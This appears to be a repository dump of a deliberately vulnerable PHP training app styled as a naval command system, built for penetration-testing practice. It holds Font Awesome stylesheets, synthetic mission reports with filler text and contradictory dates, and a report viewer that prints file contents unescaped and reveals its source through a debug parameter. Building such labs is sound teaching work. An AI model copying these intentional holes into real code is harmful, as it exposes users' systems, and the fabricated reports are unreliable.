├── assets ├── style.css └── style-enhanced.css ├── logs └── dummy_report.txt ├── main.jpeg ├── static ├── fonts │ ├── FontAwesome.otf │ ├── fontawesome-webfont.eot │ ├── fontawesome-webfont.ttf │ ├── fontawesome-webfont.woff │ └── fontawesome-webfont.woff2 ├── less │ ├── screen-reader.less │ ├── fixed-width.less │ ├── larger.less │ ├── list.less │ ├── core.less │ ├── stacked.less │ ├── font-awesome.less │ ├── bordered-pulled.less │ ├── rotated-flipped.less │ ├── path.less │ ├── animated.less │ └── mixins.less ├── scss │ ├── _fixed-width.scss │ ├── _screen-reader.scss │ ├── _larger.scss │ ├── _list.scss │ ├── _core.scss │ ├── font-awesome.scss │ ├── _stacked.scss │ ├── _bordered-pulled.scss │ ├── _rotated-flipped.scss │ ├── _path.scss │ ├── _animated.scss │ └── _mixins.scss ├── css │ └── classification.css └── js │ ├── naval_operations.js │ └── flag_popup.js ├── mission_uploads ├── Snapchat-163660861.jpg ├── map_of_ghana_and_nigeria.png └── mission_report_2.txt ├── .gitignore ├── logout.php ├── index.php ├── components └── view_report.php ├── includes ├── config.php └── attack_detection.php ├── .htaccess ├── session.php ├── missions ├── mission_report_18.txt ├── mission_report_6.txt ├── mission_report_11.txt ├── mission_report_1.txt ├── mission_report_17.txt ├── mission_report_20.txt ├── mission_report_13.txt ├── mission_report_2.txt ├── mission_report_19.txt ├── mission_report_16.txt ├── mission_report_12.txt ├── mission_report_10.txt ├── mission_report_3.txt ├── mission_report_5.txt ├── mission_report_8.txt ├── mission_report_14.txt ├── mission_report_15.txt ├── mission_report_4.txt ├── mission_report_9.txt ├── mission_report_7.txt ├── intelligence_fetch.php ├── xxe_parser.php ├── poc.php ├── preferences.php └── voucher_redeem.php ├── LICENSE ├── Dockerfile ├── honeypot_trap.php ├── admin ├── log_viewer.php ├── emergency_access.php ├── backup_db.php ├── audit_trail.php ├── deployments.json ├── access_control.php └── view_all_officers.php ├── docker-compose.yml 
├── log_flag.php ├── fake_dashboard.php ├── reset.sh ├── test_vulnerabilities.sh ├── secure_example ├── login_secure.php ├── README.md └── upload_secure.php ├── setup.sh ├── REPORT_TEMPLATE.md ├── view_profile.php ├── HINTS.md └── FLAGS.md /assets/style.css: -------------------------------------------------------------------------------- 1 | body { font-family: Arial; background: #f2f2f2; } -------------------------------------------------------------------------------- /logs/dummy_report.txt: -------------------------------------------------------------------------------- 1 | This is a dummy report file for testing command injection. 2 | -------------------------------------------------------------------------------- /main.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/main.jpeg -------------------------------------------------------------------------------- /static/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.woff: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /mission_uploads/Snapchat-163660861.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/mission_uploads/Snapchat-163660861.jpg -------------------------------------------------------------------------------- /static/fonts/fontawesome-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/static/fonts/fontawesome-webfont.woff2 -------------------------------------------------------------------------------- /mission_uploads/map_of_ghana_and_nigeria.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RedHatPentester/HIVE_NAVAL_SYSTEM/HEAD/mission_uploads/map_of_ghana_and_nigeria.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | *.log 3 | node_modules/ 4 | vendor/ 5 | .idea/ 6 | .vscode/ 7 | *.swp 8 | *.swo 9 | .env 10 | docker-compose.override.yml 11 | -------------------------------------------------------------------------------- /static/less/screen-reader.less: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { .sr-only(); } 5 | .sr-only-focusable { .sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /static/less/fixed-width.less: -------------------------------------------------------------------------------- 1 
| // Fixed Width Icons 2 | // ------------------------- 3 | .@{fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /static/scss/_fixed-width.scss: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .#{$fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /static/scss/_screen-reader.scss: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { @include sr-only(); } 5 | .sr-only-focusable { @include sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /logout.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /components/view_report.php: -------------------------------------------------------------------------------- 1 | Viewing: $file"; 8 | echo "
" . $content . "
"; 9 | 10 | // Debug mode with sensitive info leak: ?debug=true makes highlight_file(__FILE__) return this script's complete source to anyone who can reach the page (source disclosure). $_GET['debug'] is also read without isset(), so PHP 8 emits an "Undefined array key" warning whenever the parameter is absent. Both are deliberate weaknesses of this training app; a real application must never gate debug output on a query-string value. 11 | if ($_GET['debug'] == 'true') { 12 | highlight_file(__FILE__); 13 | } 14 | ?> -------------------------------------------------------------------------------- /static/less/larger.less: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .@{fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .@{fa-css-prefix}-2x { font-size: 2em; } 11 | .@{fa-css-prefix}-3x { font-size: 3em; } 12 | .@{fa-css-prefix}-4x { font-size: 4em; } 13 | .@{fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /static/scss/_larger.scss: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .#{$fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .#{$fa-css-prefix}-2x { font-size: 2em; } 11 | .#{$fa-css-prefix}-3x { font-size: 3em; } 12 | .#{$fa-css-prefix}-4x { font-size: 4em; } 13 | .#{$fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /static/less/list.less: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: @fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .@{fa-css-prefix}-li { 11 | position: absolute; 12 | left: -@fa-li-width; 13 | width: @fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.@{fa-css-prefix}-lg { 17 | left: (-@fa-li-width + (4em / 14)); 18 | } 19 | } 20 | 
-------------------------------------------------------------------------------- /static/scss/_list.scss: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: $fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .#{$fa-css-prefix}-li { 11 | position: absolute; 12 | left: -$fa-li-width; 13 | width: $fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.#{$fa-css-prefix}-lg { 17 | left: -$fa-li-width + (4em / 14); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /static/less/core.less: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /static/scss/_core.scss: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 
-------------------------------------------------------------------------------- /static/scss/font-awesome.scss: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables"; 7 | @import "mixins"; 8 | @import "path"; 9 | @import "core"; 10 | @import "larger"; 11 | @import "fixed-width"; 12 | @import "list"; 13 | @import "bordered-pulled"; 14 | @import "animated"; 15 | @import "rotated-flipped"; 16 | @import "stacked"; 17 | @import "icons"; 18 | @import "screen-reader"; 19 | -------------------------------------------------------------------------------- /static/less/stacked.less: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .@{fa-css-prefix}-stack-1x, .@{fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .@{fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .@{fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .@{fa-css-prefix}-inverse { color: @fa-inverse; } 21 | -------------------------------------------------------------------------------- /static/scss/_stacked.scss: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .#{$fa-css-prefix}-stack-1x, .#{$fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | 
text-align: center; 17 | } 18 | .#{$fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .#{$fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .#{$fa-css-prefix}-inverse { color: $fa-inverse; } 21 | -------------------------------------------------------------------------------- /static/less/font-awesome.less: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables.less"; 7 | @import "mixins.less"; 8 | @import "path.less"; 9 | @import "core.less"; 10 | @import "larger.less"; 11 | @import "fixed-width.less"; 12 | @import "list.less"; 13 | @import "bordered-pulled.less"; 14 | @import "animated.less"; 15 | @import "rotated-flipped.less"; 16 | @import "stacked.less"; 17 | @import "icons.less"; 18 | @import "screen-reader.less"; 19 | -------------------------------------------------------------------------------- /includes/config.php: -------------------------------------------------------------------------------- 1 | 22 | -------------------------------------------------------------------------------- /.htaccess: -------------------------------------------------------------------------------- 1 | # Font MIME types. Note that image/svg+xml is an active content type (SVG can embed script); never serve user-uploaded SVG with this type from the application's origin. 2 | AddType application/vnd.ms-fontobject .eot 3 | AddType application/x-font-ttf .ttf 4 | AddType application/font-woff .woff 5 | AddType application/font-woff2 .woff2 6 | AddType image/svg+xml .svg 7 | AddType application/x-font-otf .otf 8 | 9 | # Security headers. If these Header directives are wrapped in <IfModule mod_headers.c> (the wrapper is not visible in this listing), they are silently skipped when mod_headers is not loaded; verify with curl -I. X-XSS-Protection is deprecated and ignored by current browsers; a Content-Security-Policy and X-Frame-Options/frame-ancestors are the controls that actually mitigate XSS and clickjacking, and neither is set here. 10 | 11 | Header set X-Content-Type-Options "nosniff" 12 | Header set X-XSS-Protection "1; mode=block" 13 | 14 | 15 | # Disable directory listing 16 | Options -Indexes 17 | 18 | # Secure PHP files. Mapping .php to the PHP handler does not restrict anything by itself; nothing in this file disables script execution under mission_uploads/, so a file with a PHP-handled extension that the upload code lets through would execute. The enclosing <Files>/<FilesMatch> directive for SetHandler, if any, is not visible in this listing. 19 | 20 | SetHandler application/x-httpd-php 21 | 22 | -------------------------------------------------------------------------------- /static/less/bordered-pulled.less: 
-------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em @fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .@{fa-css-prefix}-pull-left { float: left; } 11 | .@{fa-css-prefix}-pull-right { float: right; } 12 | 13 | .@{fa-css-prefix} { 14 | &.@{fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.@{fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .@{fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /static/scss/_bordered-pulled.scss: -------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em $fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .#{$fa-css-prefix}-pull-left { float: left; } 11 | .#{$fa-css-prefix}-pull-right { float: right; } 12 | 13 | .#{$fa-css-prefix} { 14 | &.#{$fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.#{$fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .#{$fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /static/less/rotated-flipped.less: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-rotate-90 { .fa-icon-rotate(90deg, 1); } 5 | 
.@{fa-css-prefix}-rotate-180 { .fa-icon-rotate(180deg, 2); } 6 | .@{fa-css-prefix}-rotate-270 { .fa-icon-rotate(270deg, 3); } 7 | 8 | .@{fa-css-prefix}-flip-horizontal { .fa-icon-flip(-1, 1, 0); } 9 | .@{fa-css-prefix}-flip-vertical { .fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .@{fa-css-prefix}-rotate-90, 15 | :root .@{fa-css-prefix}-rotate-180, 16 | :root .@{fa-css-prefix}-rotate-270, 17 | :root .@{fa-css-prefix}-flip-horizontal, 18 | :root .@{fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /session.php: -------------------------------------------------------------------------------- 1 | 24 | -------------------------------------------------------------------------------- /static/scss/_rotated-flipped.scss: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-rotate-90 { @include fa-icon-rotate(90deg, 1); } 5 | .#{$fa-css-prefix}-rotate-180 { @include fa-icon-rotate(180deg, 2); } 6 | .#{$fa-css-prefix}-rotate-270 { @include fa-icon-rotate(270deg, 3); } 7 | 8 | .#{$fa-css-prefix}-flip-horizontal { @include fa-icon-flip(-1, 1, 0); } 9 | .#{$fa-css-prefix}-flip-vertical { @include fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .#{$fa-css-prefix}-rotate-90, 15 | :root .#{$fa-css-prefix}-rotate-180, 16 | :root .#{$fa-css-prefix}-rotate-270, 17 | :root .#{$fa-css-prefix}-flip-horizontal, 18 | :root .#{$fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /missions/mission_report_18.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #18 3 | ======================================= 4 | 
From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Seamless Architectures 9 | - Objective: Secured local initiative 10 | - Location: Reginaville, Venezuela 11 | - Start Time: 2025-03-11 15:12:10 12 | - End Time: 2025-03-11 08:55:53 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Trouble brother book appear military. Large stand little group. Suffer born prove treat raise move program. 17 | 18 | Submitted by: Alvin Sullivan 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_6.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #6 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incubate Frictionless Channels 9 | - Objective: Digitized bifurcated structure 10 | - Location: Arnoldburgh, Saint Barthelemy 11 | - Start Time: 2025-01-15 06:17:09 12 | - End Time: 2025-01-29 04:15:17 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Trial tend customer mean walk including world. General study event enough. Trip million few usually among science. 
17 | 18 | Submitted by: Kevin Beltran DVM 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_11.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #11 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Visualize Synergistic E-Services 9 | - Objective: Cloned client-server conglomeration 10 | - Location: Anthonymouth, Tajikistan 11 | - Start Time: 2025-03-11 09:32:47 12 | - End Time: 2025-03-14 23:18:24 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Before church after water worker authority growth. Pay coach of think management believe deep. Should yourself do word. 17 | 18 | Submitted by: Crystal Holmes 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_1.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #1 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Exploit Frictionless Relationships 9 | - Objective: Reverse-engineered 24hour capacity 10 | - Location: Port John, Czech Republic 11 | - Start Time: 2025-02-26 13:31:49 12 | - End Time: 2025-01-17 00:30:43 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Option environment public off same poor. They knowledge middle once economic. Hot return although tough operation security year. 
17 | 18 | Submitted by: David Mills 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_17.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #17 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Extend Vertical Initiatives 9 | - Objective: Persevering foreground data-warehouse 10 | - Location: East Kimberly, Iceland 11 | - Start Time: 2025-01-14 18:56:28 12 | - End Time: 2025-02-24 01:33:48 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Give response raise PM factor say. Appear arm ready answer most question significant. Peace contain democratic yourself network next. 17 | 18 | Submitted by: Michael Mccoy 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_20.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #20 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Maximize Value-Added Applications 9 | - Objective: Mandatory optimal array 10 | - Location: Port Michaelside, Syrian Arab Republic 11 | - Start Time: 2025-01-16 20:22:59 12 | - End Time: 2025-02-05 16:25:15 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Wonder environment final church will. Change stage campaign tree new ground degree. Media piece democratic there continue appear public. 
17 | 18 | Submitted by: Regina Smith 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_13.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #13 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Benchmark User-Centric Content 9 | - Objective: Re-engineered asymmetric Local Area Network 10 | - Location: Georgeview, France 11 | - Start Time: 2025-01-19 17:32:47 12 | - End Time: 2025-01-10 16:39:11 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Situation piece figure senior indeed keep four. Trade class great avoid smile. Piece society campaign range world those everyone. Goal on include same. 17 | 18 | Submitted by: Sharon Harmon 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_2.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #2 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Wireless Initiatives 9 | - Objective: Visionary coherent intranet 10 | - Location: Christineside, Gambia 11 | - Start Time: 2025-01-22 00:06:25 12 | - End Time: 2025-01-11 23:07:57 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Affect office change worker sing better across. Good I artist film democratic watch. Last student us voice memory. Clear style check defense site yard director. 
17 | 18 | Submitted by: Tiffany Davies 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_19.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #19 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Enable Proactive Communities 9 | - Objective: Horizontal interactive Graphical User Interface 10 | - Location: East Mary, Liberia 11 | - Start Time: 2025-02-21 22:19:08 12 | - End Time: 2025-01-10 15:33:35 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Mr action nothing avoid door level cover. Every your action important station. List four image official. Those approach training west maintain summer. 17 | 18 | Submitted by: Michael Alvarez 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/less/path.less: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('@{fa-font-path}/fontawesome-webfont.eot?v=@{fa-version}'); 7 | src: url('@{fa-font-path}/fontawesome-webfont.eot?#iefix&v=@{fa-version}') format('embedded-opentype'), 8 | url('@{fa-font-path}/fontawesome-webfont.woff2?v=@{fa-version}') format('woff2'), 9 | url('@{fa-font-path}/fontawesome-webfont.woff?v=@{fa-version}') format('woff'), 10 | url('@{fa-font-path}/fontawesome-webfont.ttf?v=@{fa-version}') format('truetype'), 11 | url('@{fa-font-path}/fontawesome-webfont.svg?v=@{fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('@{fa-font-path}/FontAwesome.otf') format('opentype'); // used when 
developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /mission_uploads/mission_report_2.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #2 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Re-Contextualize Wireless Initiatives 9 | - Objective: Visionary coherent intranet 10 | - Location: Christineside, Gambia 11 | - Start Time: 2025-01-22 00:06:25 12 | - End Time: 2025-01-11 23:07:57 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Affect office change worker sing better across. Good I artist film democratic watch. Last student us voice memory. Clear style check defense site yard director. 17 | 18 | Submitted by: Tiffany Davies 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_16.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #16 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Incentivize Killer Synergies 9 | - Objective: Team-oriented bi-directional product 10 | - Location: Patrickton, Andorra 11 | - Start Time: 2025-01-30 00:42:49 12 | - End Time: 2025-01-25 15:37:06 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Bag family husband issue consider available response. Ago leg coach news himself despite. Situation meeting election sense. Most long phone best political stay less small. 
17 | 18 | Submitted by: James Nichols 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /static/scss/_path.scss: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?v=#{$fa-version}'); 7 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?#iefix&v=#{$fa-version}') format('embedded-opentype'), 8 | url('#{$fa-font-path}/fontawesome-webfont.woff2?v=#{$fa-version}') format('woff2'), 9 | url('#{$fa-font-path}/fontawesome-webfont.woff?v=#{$fa-version}') format('woff'), 10 | url('#{$fa-font-path}/fontawesome-webfont.ttf?v=#{$fa-version}') format('truetype'), 11 | url('#{$fa-font-path}/fontawesome-webfont.svg?v=#{$fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('#{$fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /missions/mission_report_12.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #12 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Evolve Holistic Markets 9 | - Objective: Ameliorated fault-tolerant complexity 10 | - Location: West Christopherhaven, Lebanon 11 | - Start Time: 2025-03-10 11:42:51 12 | - End Time: 2025-02-12 23:36:54 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Box exactly fine head law summer church clear. Chance score hope success. Game may worry type success memory born save. Particularly able appear energy discussion professor even. 
17 | 18 | Submitted by: Ronald Chang 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_10.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #10 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Target Granular Bandwidth 9 | - Objective: Integrated even-keeled framework 10 | - Location: Kayleemouth, Congo 11 | - Start Time: 2025-02-11 09:16:53 12 | - End Time: 2025-02-25 10:23:14 13 | 14 | Status: 15 | - Mission Outcome: FAILED 16 | - Notes: Type weight share serve professional consumer than. Figure government agent school season. Popular event strategy call writer glass true. Similar south only protect white pay during. Draw soon always again. 17 | 18 | Submitted by: Erika Larsen 19 | Designation: Naval Operations Officer 20 | ======================================= 21 | -------------------------------------------------------------------------------- /missions/mission_report_3.txt: -------------------------------------------------------------------------------- 1 | 2 | CONFIDENTIAL MISSION REPORT #3 3 | ======================================= 4 | From: Naval Intelligence Directorate 5 | To: Command HQ 6 | 7 | Mission Summary: 8 | - Operation Codename: Drive Synergistic Infrastructures 9 | - Objective: Monitored national hub 10 | - Location: Allenborough, Saudi Arabia 11 | - Start Time: 2025-03-22 14:11:43 12 | - End Time: 2025-01-17 08:04:44 13 | 14 | Status: 15 | - Mission Outcome: SUCCESS 16 | - Notes: Thought bag score but. Bring experience say moment inside writer pass. Throw reality military idea allow party. Rich moment turn tell politics beyond. Finish bill real within. Leader do former floor war dinner. 
